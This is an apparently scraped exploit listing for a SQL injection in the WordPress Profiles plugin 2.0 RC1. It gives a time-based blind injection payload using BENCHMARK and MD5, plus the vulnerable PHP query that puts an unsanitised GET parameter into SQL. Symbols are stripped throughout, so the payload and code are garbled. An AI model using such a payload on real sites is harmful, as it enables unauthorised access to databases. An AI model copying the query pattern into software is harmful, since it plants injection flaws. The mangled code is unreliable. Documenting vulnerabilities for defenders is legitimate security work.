WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress Profiles plugin = 2.0 RC1 SQL Injection Vulnerability Date: 2011-08-28 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/profiles.2.0.RC1.zip Version: 2.0 RC1 tested Note:...

WordPress Profiles 2.0 RC1 SQL Injection

Exploit Title: WordPress Profiles plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $query = "SELECT FROM ".$wpdb-prefix."bios WHERE id='$GETid'"; ... $result = mysqlquery$query;...